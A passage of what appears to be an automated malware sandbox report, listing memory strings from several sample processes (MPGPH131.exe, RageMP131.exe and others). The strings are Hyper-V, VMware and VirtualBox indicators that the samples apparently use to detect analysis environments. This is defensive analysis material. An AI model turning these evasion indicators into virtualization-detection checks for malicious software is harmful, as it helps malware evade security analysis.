            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Hyper-V (guest)
            Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: MPGPH131.exe, 00000008.00000002.4459782824.0000000001691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000t
            Source: Amcache.hve.1.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 10 Microsoft Hyper-V Server
            Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.1.drBinary or memory string: \driver\vmci,\driver\pci
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000B52000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: ~VirtualMachineTypes
            Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000a
            Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}!!fW
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000B52000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
            Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000001.00000003.2022624316.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh-(
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2016 Microsoft Hyper-V Server
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.0000000000802000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000B52000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 11 Server Standard without Hyper-V
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: )Windows 8 Server Standard without Hyper-V
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
            Source: MPGPH131.exe, 00000007.00000003.2101195637.00000000013EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}@8
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
            Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}MAIG9
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: %Windows 2012 Microsoft Hyper-V Server
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Hyper-V
            Source: Amcache.hve.1.drBinary or memory string: VMware
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: $Windows 8.1 Microsoft Hyper-V Server
            Source: MPGPH131.exe, 00000008.00000002.4459782824.00000000016A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Pc=
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: ,Windows 2012 Server Standard without Hyper-V
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2012 Microsoft Hyper-V Server
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
            Source: Amcache.hve.1.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 10 Essential Server Solutions without Hyper-V
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 8 Essential Server Solutions without Hyper-V
            Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000001.00000003.2022506492.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369419269.0000000000C65000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369186739.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369186739.0000000000C5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 10 Server Standard without Hyper-V (core)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
            Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
            Source: Amcache.hve.1.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: %Windows 2016 Microsoft Hyper-V Server
            Source: MPGPH131.exe, 00000007.00000002.4459125656.000000000129C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b},
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
            Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}j
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: +Windows 8.1 Server Standard without Hyper-V
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2016 Server Standard without Hyper-V
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4459917823.00000000021A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}tcachlX
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
            Source: jHYZko.exe, 00000001.00000002.2306997313.000000000125E000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000001.00000003.2022624316.0000000001277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnZW
            Source: Amcache.hve.1.drBinary or memory string: VMware20,1
            Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
            Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.1.drBinary or memory string: VMware VMCI Bus Device
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
            Source: MPGPH131.exe, 00000008.00000002.4459782824.0000000001667000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}P
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
            Source: Amcache.hve.1.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2016 Server Standard without Hyper-V (core)
            Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 8 Server Standard without Hyper-V (core)
            Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
            Source: Amcache.hve.1.drBinary or memory string: VMware20,1hbin@
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
            Source: RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: xVBoxService.exe
            Source: Amcache.hve.1.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4459557759.0000000001FFC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}|
            Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
